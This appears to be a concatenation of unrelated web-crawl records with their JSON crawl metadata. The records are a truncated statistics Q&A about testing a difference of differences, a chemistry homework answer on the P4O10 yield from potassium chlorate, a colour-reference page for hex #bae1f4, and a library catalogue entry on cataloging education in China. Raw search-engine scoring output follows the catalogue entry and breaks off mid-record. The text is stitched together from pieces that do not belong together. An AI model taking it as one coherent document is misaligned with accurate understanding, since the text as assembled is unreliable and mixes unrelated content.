mean B vs. C by a constant but increases each ones' variability.\n– John\nAug 16, 2013 at 4:03\n• What I omitted is that A-B and A-C go through a non-linear function gfp and I need a mean and confidence on the output of gfp values. Aug 16, 2013 at 6:17\n• Then can you please put the information that we need to answer the question ... in the question? I'd start with an explanation of whatever that comment was trying to explain. Aug 16, 2013 at 6:32\n\n$H_0: \\mu_{A-B} - \\mu_{A-C} = 0$ vs its negation\nBut this is testing whether $(\\mu_A - \\mu_B) - (\\mu_A - \\mu_C)$ differs from 0.\nCancel out the $\\mu_A$ terms leaving: $H_0: \\mu_C - \\mu_B = 0$" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.9397324,"math_prob":0.8636562,"size":763,"snap":"2023-40-2023-50","text_gpt3_token_len":171,"char_repetition_ratio":0.14097497,"word_repetition_ratio":0.0,"special_character_ratio":0.21756226,"punctuation_ratio":0.073619634,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.995689,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-12-10T04:49:58Z\",\"WARC-Record-ID\":\"<urn:uuid:6bbe2b9d-fe73-47f2-83d4-ff0da4b7b93e>\",\"Content-Length\":\"164108\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:4c92b0f9-4fe6-4643-be18-9b43123a9ad6>\",\"WARC-Concurrent-To\":\"<urn:uuid:73e9e706-642a-4aa8-b04e-f228756ff78f>\",\"WARC-IP-Address\":\"104.18.43.226\",\"WARC-Target-URI\":\"https://stats.stackexchange.com/questions/67537/permutation-bootstrapping-for-testing-difference-of-difference\",\"WARC-Payload-Digest\":\"sha1:ANAK5TGHCSUVQ6C6M4ITXWQ3MRKKZS36\",\"WARC-Block-Digest\":\"sha1:4JFTF7LW2A576ASHBRRS4VAISHLJ54EH\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-50/CC-MAIN-2023-50_segments_1700679101195.85_warc_CC-MAIN-20231210025335-20231210055335-00357.warc.gz\"}"}
https://www.assignmentexpert.com/homework-answers/chemistry/inorganic-chemistry/question-110004
[ "# Answer to Question #110004 in Inorganic Chemistry for Nick\n\nQuestion #110004\nThe reaction between potassium chlorate and red phosphorus takes place when you strike a match on a matchbox. If you were to react 51.7 g of potassium chlorate (KClO3) with excess red phosphorus, what mass of tetraphosphorus decaoxide (P4O10) would be produced?\n1\n2020-04-18T07:00:39-0400\n\nThe reaction is:\n\n10KClO3(s) + 3P4(s) = 3P4O10(s) + 10KCl(s)\n\nConvert to moles:\n\nn(KClO3) = m/M = 51.7g/122.55g/mol = 0.422 mol\n\nMultiply by mole ratio:\n\nn(P4O10) = n(KClO3)*3/10 = 0.127 mol\n\nConvert to grams:\n\nm(P4O10) = n*M = 0.127mol*283.89g/mol = 36.05 g\n\nNeed a fast expert's response?\n\nSubmit order\n\nand get a quick answer at the best price\n\nfor any assignment or question with DETAILED EXPLANATIONS!" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.63466084,"math_prob":0.9664914,"size":276,"snap":"2021-31-2021-39","text_gpt3_token_len":132,"char_repetition_ratio":0.121323526,"word_repetition_ratio":0.0,"special_character_ratio":0.51449275,"punctuation_ratio":0.1594203,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.98811173,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-09-24T06:32:39Z\",\"WARC-Record-ID\":\"<urn:uuid:81517a5a-8d2d-4f4b-b354-667fb527ef1d>\",\"Content-Length\":\"557645\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:2bbdddd7-9240-4698-ab5c-672ae12cffce>\",\"WARC-Concurrent-To\":\"<urn:uuid:73a75a9d-ce85-4c7a-8037-3d8c40f8c79b>\",\"WARC-IP-Address\":\"52.24.16.199\",\"WARC-Target-URI\":\"https://www.assignmentexpert.com/homework-answers/chemistry/inorganic-chemistry/question-110004\",\"WARC-Payload-Digest\":\"sha1:ORZUWVAMRA5Q3EGNXVK7CJYP4Q6NXXZ2\",\"WARC-Block-Digest\":\"sha1:DRKNTEF7RQLQA6UUDEBJIITPGNLHICHL\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-39/CC-MAIN-2021-39_segments_1631780057504.60_warc_CC-MAIN-20210924050055-20210924080055-00277.warc.gz\"}"}
https://www.colorhexa.com/bae1f4
[ "# #bae1f4 Color Information\n\nIn a RGB color space, hex #bae1f4 is composed of 72.9% red, 88.2% green and 95.7% blue. Whereas in a CMYK color space, it is composed of 23.8% cyan, 7.8% magenta, 0% yellow and 4.3% black. It has a hue angle of 199.7 degrees, a saturation of 72.5% and a lightness of 84.3%. #bae1f4 color hex could be obtained by blending #ffffff with #75c3e9. Closest websafe color is: #ccccff.\n\n• R 73\n• G 88\n• B 96\nRGB color chart\n• C 24\n• M 8\n• Y 0\n• K 4\nCMYK color chart\n\n#bae1f4 color description : Very soft blue.\n\n# #bae1f4 Color Conversion\n\nThe hexadecimal color #bae1f4 has RGB values of R:186, G:225, B:244 and CMYK values of C:0.24, M:0.08, Y:0, K:0.04. Its decimal value is 12247540.\n\nHex triplet RGB Decimal bae1f4 `#bae1f4` 186, 225, 244 `rgb(186,225,244)` 72.9, 88.2, 95.7 `rgb(72.9%,88.2%,95.7%)` 24, 8, 0, 4 199.7°, 72.5, 84.3 `hsl(199.7,72.5%,84.3%)` 199.7°, 23.8, 95.7 ccccff `#ccccff`\nCIE-LAB 87.397, -8.576, -13.446 63.5, 70.819, 95.907 0.276, 0.308, 70.819 87.397, 15.948, 237.469 87.397, -20.615, -19.793 84.154, -12.579, -8.662 10111010, 11100001, 11110100\n\n# Color Schemes with #bae1f4\n\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #f4cdba\n``#f4cdba` `rgb(244,205,186)``\nComplementary Color\n• #baf4ea\n``#baf4ea` `rgb(186,244,234)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #bac4f4\n``#bac4f4` `rgb(186,196,244)``\nAnalogous Color\n• #f4eaba\n``#f4eaba` `rgb(244,234,186)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #f4bac4\n``#f4bac4` `rgb(244,186,196)``\nSplit Complementary Color\n• #e1f4ba\n``#e1f4ba` `rgb(225,244,186)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #f4bae1\n``#f4bae1` `rgb(244,186,225)``\n• #baf4cd\n``#baf4cd` `rgb(186,244,205)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #f4bae1\n``#f4bae1` `rgb(244,186,225)``\n• #f4cdba\n``#f4cdba` `rgb(244,205,186)``\n• #78c4e9\n``#78c4e9` `rgb(120,196,233)``\n• #8eceed\n``#8eceed` `rgb(142,206,237)``\n• #a4d7f0\n``#a4d7f0` `rgb(164,215,240)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #d0ebf8\n``#d0ebf8` `rgb(208,235,248)``\n• #e6f4fb\n``#e6f4fb` `rgb(230,244,251)``\n• #fcfeff\n``#fcfeff` `rgb(252,254,255)``\nMonochromatic Color\n\n# Alternatives to #bae1f4\n\nBelow, you can see some colors close to #bae1f4. Having a set of related colors can be useful if you need an inspirational alternative to your original color choice.\n\n• #baf0f4\n``#baf0f4` `rgb(186,240,244)``\n• #baebf4\n``#baebf4` `rgb(186,235,244)``\n• #bae6f4\n``#bae6f4` `rgb(186,230,244)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n``#badcf4` `rgb(186,220,244)``\n``#bad7f4` `rgb(186,215,244)``\n``#bad3f4` `rgb(186,211,244)``\nSimilar Colors\n\n# #bae1f4 Preview\n\nThis text has a font color of #bae1f4.\n\n``<span style=\"color:#bae1f4;\">Text here</span>``\n#bae1f4 background color\n\nThis paragraph has a background color of #bae1f4.\n\n``<p style=\"background-color:#bae1f4;\">Content here</p>``\n#bae1f4 border color\n\nThis element has a border color of #bae1f4.\n\n``<div style=\"border:1px solid #bae1f4;\">Content here</div>``\nCSS codes\n``.text {color:#bae1f4;}``\n``.background {background-color:#bae1f4;}``\n``.border {border:1px solid #bae1f4;}``\n\n# Shades and Tints of #bae1f4\n\nA shade is achieved by adding black to any pure hue, while a tint is created by mixing white to any pure color. 
In this example, #020b10 is the darkest color, while #fefeff is the lightest one.\n\n• #020b10\n``#020b10` `rgb(2,11,16)``\n• #051821\n``#051821` `rgb(5,24,33)``\n• #082431\n``#082431` `rgb(8,36,49)``\n• #0b3042\n``#0b3042` `rgb(11,48,66)``\n• #0d3c53\n``#0d3c53` `rgb(13,60,83)``\n• #104964\n``#104964` `rgb(16,73,100)``\n• #135575\n``#135575` `rgb(19,85,117)``\n• #156186\n``#156186` `rgb(21,97,134)``\n• #186d97\n``#186d97` `rgb(24,109,151)``\n• #1b7aa8\n``#1b7aa8` `rgb(27,122,168)``\n• #1d86b9\n``#1d86b9` `rgb(29,134,185)``\n• #2092ca\n``#2092ca` `rgb(32,146,202)``\n• #239edb\n``#239edb` `rgb(35,158,219)``\n• #33a6de\n``#33a6de` `rgb(51,166,222)``\n• #44aee1\n``#44aee1` `rgb(68,174,225)``\n• #54b5e4\n``#54b5e4` `rgb(84,181,228)``\n• #65bce7\n``#65bce7` `rgb(101,188,231)``\n• #76c4e9\n``#76c4e9` `rgb(118,196,233)``\n• #87cbec\n``#87cbec` `rgb(135,203,236)``\n• #98d2ef\n``#98d2ef` `rgb(152,210,239)``\n• #a9daf1\n``#a9daf1` `rgb(169,218,241)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #cbe8f7\n``#cbe8f7` `rgb(203,232,247)``\n• #dcf0f9\n``#dcf0f9` `rgb(220,240,249)``\n• #edf7fc\n``#edf7fc` `rgb(237,247,252)``\n• #fefeff\n``#fefeff` `rgb(254,254,255)``\nTint Color Variation\n\n# Tones of #bae1f4\n\nA tone is produced by adding gray to any pure hue. In this case, #d6d7d8 is the less saturated color, while #b1e4fd is the most saturated one.\n\n• #d6d7d8\n``#d6d7d8` `rgb(214,215,216)``\n• #d3d9db\n``#d3d9db` `rgb(211,217,219)``\n``#d0dade` `rgb(208,218,222)``\n• #ccdbe2\n``#ccdbe2` `rgb(204,219,226)``\n• #c9dce5\n``#c9dce5` `rgb(201,220,229)``\n• #c6dde8\n``#c6dde8` `rgb(198,221,232)``\n• #c3deeb\n``#c3deeb` `rgb(195,222,235)``\n• #c0dfee\n``#c0dfee` `rgb(192,223,238)``\n• #bde0f1\n``#bde0f1` `rgb(189,224,241)``\n• #bae1f4\n``#bae1f4` `rgb(186,225,244)``\n• #b7e2f7\n``#b7e2f7` `rgb(183,226,247)``\n• #b4e3fa\n``#b4e3fa` `rgb(180,227,250)``\n• #b1e4fd\n``#b1e4fd` `rgb(177,228,253)``\nTone Color Variation\n\n# Color Blindness Simulator\n\nBelow, you can see how #bae1f4 is perceived by people affected by a color vision deficiency. This can be useful if you need to ensure your color combinations are accessible to color-blind users.\n\nMonochromacy\n• Achromatopsia 0.005% of the population\n• Atypical Achromatopsia 0.001% of the population\nDichromacy\n• Protanopia 1% of men\n• Deuteranopia 1% of men\n• Tritanopia 0.001% of the population\nTrichromacy\n• Protanomaly 1% of men, 0.01% of women\n• Deuteranomaly 6% of men, 0.4% of women\n• Tritanomaly 0.01% of the population" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.5042157,"math_prob":0.64282244,"size":3730,"snap":"2021-31-2021-39","text_gpt3_token_len":1710,"char_repetition_ratio":0.12399356,"word_repetition_ratio":0.011090573,"special_character_ratio":0.5254692,"punctuation_ratio":0.23783186,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.95307726,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2021-08-05T18:54:26Z\",\"WARC-Record-ID\":\"<urn:uuid:22d34f0f-a496-4b3c-9bb1-f8b41421baa9>\",\"Content-Length\":\"36248\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:9aabfba2-f8ce-4261-babc-02ccb1c87eb8>\",\"WARC-Concurrent-To\":\"<urn:uuid:1b010d67-5403-42b7-9483-f2eaecce610a>\",\"WARC-IP-Address\":\"178.32.117.56\",\"WARC-Target-URI\":\"https://www.colorhexa.com/bae1f4\",\"WARC-Payload-Digest\":\"sha1:XK6G2BPXMUYAYUKUT3SX4HB5UD6YJTOA\",\"WARC-Block-Digest\":\"sha1:XPQPEM5LD4LSLFEQZ5773IXZXH5W4T3D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2021/CC-MAIN-2021-31/CC-MAIN-2021-31_segments_1627046156141.29_warc_CC-MAIN-20210805161906-20210805191906-00403.warc.gz\"}"}
https://ixtrieve.fh-koeln.de/birds/litie/document/12614
[ "# Document (#12614)\n\nAuthor\nSi, L.\nTitle\n¬The status quo and future development of cataloging and classification education in China\nSource\nCataloging and classification quarterly. 41(2005) no.2, S.85-103\nYear\n2005\nAbstract\nThis article depicts the status quo of cataloging and classification education in China, including the library science programs, their curricula, the degrees offered, the contents of courses, and the selection of textbooks. It also analyzes the current problems in library science programs and projects the possible improvements and progress in the teaching in the next five to ten years.\nFootnote\nBeitrag eines Themenheftes \"Education for cataloging: international perspectives. Part I\"\nTheme\nAusbildung\nLocation\nChina\n\n## Similar documents (content)\n\n1. Zhanghua, M.: ¬The education of cataloging and classification in China (2005) 0.72\n```0.71667415 = sum of:\n0.71667415 = product of:\n1.4930712 = sum of:\n0.062483825 = weight(abstract_txt:contents in 751) [ClassicSimilarity], result of:\n0.062483825 = score(doc=751,freq=1.0), product of:\n0.13809718 = queryWeight, product of:\n1.249942 = boost\n5.7915225 = idf(docFreq=358, maxDocs=43254)\n0.019076655 = queryNorm\n0.4524627 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.7915225 = idf(docFreq=358, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.088879324 = weight(abstract_txt:teaching in 751) [ClassicSimilarity], result of:\n0.088879324 = score(doc=751,freq=2.0), product of:\n0.13863203 = queryWeight, product of:\n1.2523601 = boost\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.019076655 = queryNorm\n0.6411168 = fieldWeight in 751, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.06941103 = weight(abstract_txt:offered in 751) [ClassicSimilarity], result of:\n0.06941103 = score(doc=751,freq=1.0), product of:\n0.148124 = queryWeight, product of:\n1.2945241 = boost\n5.998091 = idf(docFreq=291, maxDocs=43254)\n0.019076655 = queryNorm\n0.46860087 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.998091 = idf(docFreq=291, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.02078936 = weight(abstract_txt:library in 751) [ClassicSimilarity], result of:\n0.02078936 = score(doc=751,freq=1.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.24884598 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.20431964 = weight(abstract_txt:courses in 751) [ClassicSimilarity], result of:\n0.20431964 = score(doc=751,freq=4.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n1.0660648 = fieldWeight in 751, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.20803992 = weight(abstract_txt:curricula in 751) [ClassicSimilarity], result of:\n0.20803992 = score(doc=751,freq=2.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n0.8512409 = fieldWeight in 751, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n7.704553 = idf(docFreq=52, 
maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.03792717 = weight(abstract_txt:science in 751) [ClassicSimilarity], result of:\n0.03792717 = score(doc=751,freq=1.0), product of:\n0.124733575 = queryWeight, product of:\n1.67998 = boost\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.019076655 = queryNorm\n0.30406544 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.07119972 = weight(abstract_txt:classification in 751) [ClassicSimilarity], result of:\n0.07119972 = score(doc=751,freq=3.0), product of:\n0.13161181 = queryWeight, product of:\n1.7256783 = boost\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.019076655 = queryNorm\n0.5409828 = fieldWeight in 751, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.07911239 = weight(abstract_txt:cataloging in 751) [ClassicSimilarity], result of:\n0.07911239 = score(doc=751,freq=1.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n0.38850662 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.21448134 = weight(abstract_txt:education in 751) [ClassicSimilarity], result of:\n0.21448134 = score(doc=751,freq=6.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.9843824 = fieldWeight in 751, product of:\n2.4494898 = tf(freq=6.0), with freq of:\n6.0 = termFreq=6.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.13811357 = weight(abstract_txt:programs in 751) [ClassicSimilarity], result of:\n0.13811357 = score(doc=751,freq=1.0), product of:\n0.29523918 = queryWeight, product of:\n2.5846362 = boost\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.019076655 = queryNorm\n0.46780232 = fieldWeight in 751, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.2983139 = weight(abstract_txt:china in 751) [ClassicSimilarity], result of:\n0.2983139 = score(doc=751,freq=2.0), product of:\n0.39155135 = queryWeight, product of:\n2.9765062 = boost\n6.8957214 = idf(docFreq=118, maxDocs=43254)\n0.019076655 = queryNorm\n0.76187676 = fieldWeight in 751, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n6.8957214 = idf(docFreq=118, maxDocs=43254)\n0.078125 = fieldNorm(doc=751)\n0.48 = coord(12/25)\n```\n2. 
Kokabi, M.: ¬An account of cataloging and classification education in Iranian universities (2005) 0.45\n```0.44835687 = sum of:\n0.44835687 = product of:\n1.0189929 = sum of:\n0.047580045 = weight(abstract_txt:years in 762) [ClassicSimilarity], result of:\n0.047580045 = score(doc=762,freq=2.0), product of:\n0.09140003 = queryWeight, product of:\n1.0168821 = boost\n4.711655 = idf(docFreq=1056, maxDocs=43254)\n0.019076655 = queryNorm\n0.52056926 = fieldWeight in 762, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n4.711655 = idf(docFreq=1056, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.088879324 = weight(abstract_txt:teaching in 762) [ClassicSimilarity], result of:\n0.088879324 = score(doc=762,freq=2.0), product of:\n0.13863203 = queryWeight, product of:\n1.2523601 = boost\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.019076655 = queryNorm\n0.6411168 = fieldWeight in 762, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.06691968 = weight(abstract_txt:next in 762) [ClassicSimilarity], result of:\n0.06691968 = score(doc=762,freq=1.0), product of:\n0.14455806 = queryWeight, product of:\n1.278847 = boost\n5.925452 = idf(docFreq=313, maxDocs=43254)\n0.019076655 = queryNorm\n0.46292597 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.925452 = idf(docFreq=313, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.029400595 = weight(abstract_txt:library in 762) [ClassicSimilarity], result of:\n0.029400595 = score(doc=762,freq=2.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.35192135 = fieldWeight in 762, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.10215982 = weight(abstract_txt:courses in 762) [ClassicSimilarity], result of:\n0.10215982 = score(doc=762,freq=1.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n0.5330324 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.119932204 = weight(abstract_txt:degrees in 762) [ClassicSimilarity], result of:\n0.119932204 = score(doc=762,freq=1.0), product of:\n0.21328662 = queryWeight, product of:\n1.5533855 = boost\n7.1975083 = idf(docFreq=87, maxDocs=43254)\n0.019076655 = queryNorm\n0.56230533 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.1975083 = idf(docFreq=87, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.14710645 = weight(abstract_txt:curricula in 762) [ClassicSimilarity], result of:\n0.14710645 = score(doc=762,freq=1.0), product of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n0.6019182 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.03792717 = weight(abstract_txt:science in 762) [ClassicSimilarity], result of:\n0.03792717 = score(doc=762,freq=1.0), product of:\n0.124733575 = queryWeight, product of:\n1.67998 = boost\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.019076655 = queryNorm\n0.30406544 = fieldWeight in 762, product 
of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n3.8920376 = idf(docFreq=2398, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.08221436 = weight(abstract_txt:classification in 762) [ClassicSimilarity], result of:\n0.08221436 = score(doc=762,freq=4.0), product of:\n0.13161181 = queryWeight, product of:\n1.7256783 = boost\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.019076655 = queryNorm\n0.6246731 = fieldWeight in 762, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.2093117 = weight(abstract_txt:cataloging in 762) [ClassicSimilarity], result of:\n0.2093117 = score(doc=762,freq=7.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n1.0278919 = fieldWeight in 762, product of:\n2.6457512 = tf(freq=7.0), with freq of:\n7.0 = termFreq=7.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.08756164 = weight(abstract_txt:education in 762) [ClassicSimilarity], result of:\n0.08756164 = score(doc=762,freq=1.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.40187243 = fieldWeight in 762, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.078125 = fieldNorm(doc=762)\n0.44 = coord(11/25)\n```\n3. Haider, S.J.: Teaching of cataloging and classification in Pakistan (2006) 0.41\n```0.41312176 = sum of:\n0.41312176 = product of:\n1.1475604 = sum of:\n0.07498059 = weight(abstract_txt:contents in 1354) [ClassicSimilarity], result of:\n0.07498059 = score(doc=1354,freq=1.0), product of:\n0.13809718 = queryWeight, product of:\n1.249942 = boost\n5.7915225 = idf(docFreq=358, maxDocs=43254)\n0.019076655 = queryNorm\n0.5429552 = fieldWeight in 1354, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.7915225 = idf(docFreq=358, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.07541661 = weight(abstract_txt:teaching in 1354) [ClassicSimilarity], result of:\n0.07541661 = score(doc=1354,freq=1.0), product of:\n0.13863203 = queryWeight, product of:\n1.2523601 = boost\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.019076655 = queryNorm\n0.5440057 = fieldWeight in 1354, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.802727 = idf(docFreq=354, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.035280716 = weight(abstract_txt:library in 1354) [ClassicSimilarity], result of:\n0.035280716 = score(doc=1354,freq=2.0), product of:\n0.083543085 = queryWeight, product of:\n1.3748891 = boost\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.019076655 = queryNorm\n0.42230564 = fieldWeight in 1354, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n3.1852286 = idf(docFreq=4863, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.12259178 = weight(abstract_txt:courses in 1354) [ClassicSimilarity], result of:\n0.12259178 = score(doc=1354,freq=1.0), product of:\n0.1916578 = queryWeight, product of:\n1.4725182 = boost\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.019076655 = queryNorm\n0.6396389 = fieldWeight in 1354, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n6.822815 = idf(docFreq=127, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.24964795 = weight(abstract_txt:curricula in 1354) [ClassicSimilarity], result of:\n0.24964795 = score(doc=1354,freq=2.0), product 
of:\n0.24439608 = queryWeight, product of:\n1.6628174 = boost\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.019076655 = queryNorm\n1.0214891 = fieldWeight in 1354, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n7.704553 = idf(docFreq=52, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.08543967 = weight(abstract_txt:classification in 1354) [ClassicSimilarity], result of:\n0.08543967 = score(doc=1354,freq=3.0), product of:\n0.13161181 = queryWeight, product of:\n1.7256783 = boost\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.019076655 = queryNorm\n0.64917934 = fieldWeight in 1354, product of:\n1.7320508 = tf(freq=3.0), with freq of:\n3.0 = termFreq=3.0\n3.9979079 = idf(docFreq=2157, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.18986972 = weight(abstract_txt:cataloging in 1354) [ClassicSimilarity], result of:\n0.18986972 = score(doc=1354,freq=4.0), product of:\n0.20363201 = queryWeight, product of:\n2.1465225 = boost\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.019076655 = queryNorm\n0.93241584 = fieldWeight in 1354, product of:\n2.0 = tf(freq=4.0), with freq of:\n4.0 = termFreq=4.0\n4.9728847 = idf(docFreq=813, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.14859703 = weight(abstract_txt:education in 1354) [ClassicSimilarity], result of:\n0.14859703 = score(doc=1354,freq=2.0), product of:\n0.21788417 = queryWeight, product of:\n2.2203696 = boost\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.019076655 = queryNorm\n0.68200016 = fieldWeight in 1354, product of:\n1.4142135 = tf(freq=2.0), with freq of:\n2.0 = termFreq=2.0\n5.143967 = idf(docFreq=685, maxDocs=43254)\n0.09375 = fieldNorm(doc=1354)\n0.16573629 = weight(abstract_txt:programs in 1354) [ClassicSimilarity], result of:\n0.16573629 = score(doc=1354,freq=1.0), product of:\n0.29523918 = queryWeight, product of:\n2.5846362 = boost\n5.9878697 = idf(docFreq=294, maxDocs=43254)\n0.019076655 = queryNorm\n0.5613628 = fieldWeight in 1354, product of:\n1.0 = tf(freq=1.0), with freq of:\n1.0 = termFreq=1.0\n5.9878697 = idf(docFreq=294, 